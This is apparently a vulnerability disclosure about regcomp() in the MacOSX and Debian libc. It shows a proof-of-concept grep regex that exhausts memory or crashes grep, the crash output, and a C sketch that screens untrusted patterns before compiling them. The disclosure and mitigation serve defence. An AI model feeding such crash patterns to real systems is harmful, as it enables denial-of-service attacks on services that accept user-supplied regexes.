---- 0. Where is the problem? ----
Some time ago I reported vulnerabilities in regcomp() in the BSD implementation (CVE-2011-3336) and the GNU libc implementation (CVE-2010-4051, CVE-2010-4052). Now is the time for MacOSX and other software, and it seems that the problem is still in their implementations.
--- MacOSX 10.9.2 libc PoC ---
0:kozak6 cx$ ls |grep -E '((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.* (.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))'
grep(715,0x7fff746ed310) malloc: *** mach_vm_map(size=18446744071973109760) failed (error code=3)
*** error: can't allocate region
*** set a breakpoint in malloc_error_break to debug
grep: out of memory
--- MacOSX 10.9.2 libc PoC ---
Hmm. On Debian 6, I get an even worse-looking result:
pavel@amd:~$ ls |grep -E '((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))'
Segmentation fault (core dumped)
pavel@amd:~$
pavel@amd:~$ cat /etc/debian_version
6.0.9
pavel@amd:~$
pavel@amd:~/WWW$ uname -a
Linux amd 3.15.0-rc8+ #364 SMP Sun Jun 8 13:47:52 CEST 2014 i686 GNU/Linux
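
For software that passes untrusted patterns to regcomp(), one mitigation is to reject patterns with the shape seen above (deep group nesting, many {n} intervals, quantified groups inside quantified groups) before compiling. The following is an added example, not code from the advisory or from any libc; the names ere_within_budget and safe_regcomp and all limits are assumptions, and such a check should still be paired with memory and CPU limits on the process.

```c
#include <regex.h>
#include <stddef.h>
#include <string.h>

/* Assumed budgets for this sketch; tune them to the patterns you expect. */
enum { MAX_LEN = 256, MAX_DEPTH = 8, MAX_INTERVALS = 4, MAX_QUANT_NEST = 2 };

/* Return 0 if an untrusted POSIX ERE stays inside the budgets, -1 if not. */
int ere_within_budget(const char *p)
{
    size_t len = strlen(p);
    int qnest[MAX_DEPTH + 1] = {0};  /* deepest quantified-group chain per level */
    int depth = 0, intervals = 0, in_bracket = 0;

    if (len > MAX_LEN) return -1;
    for (size_t i = 0; i < len; i++) {
        char c = p[i];
        if (in_bracket) {              /* simplified: ends at the first ']' */
            if (c == ']') in_bracket = 0;
        } else if (c == '\\') {
            i++;                       /* escaped character is a literal */
        } else if (c == '[') {
            in_bracket = 1;
        } else if (c == '(') {
            if (++depth > MAX_DEPTH) return -1;
            qnest[depth] = 0;
        } else if (c == ')' && depth > 0) {
            int q = qnest[depth--];    /* chain length inside this group */
            if (i + 1 < len && strchr("*+?{", p[i + 1])) q++;
            if (q > MAX_QUANT_NEST) return -1;
            if (q > qnest[depth]) qnest[depth] = q;
        } else if (c == '{' && ++intervals > MAX_INTERVALS) {
            return -1;
        }
    }
    return 0;
}

/* Compile only after the budget check; REG_BADPAT signals a rejected pattern. */
int safe_regcomp(regex_t *re, const char *pattern)
{
    if (ere_within_budget(pattern) != 0) return REG_BADPAT;
    return regcomp(re, pattern, REG_EXTENDED | REG_NOSUB);
}
```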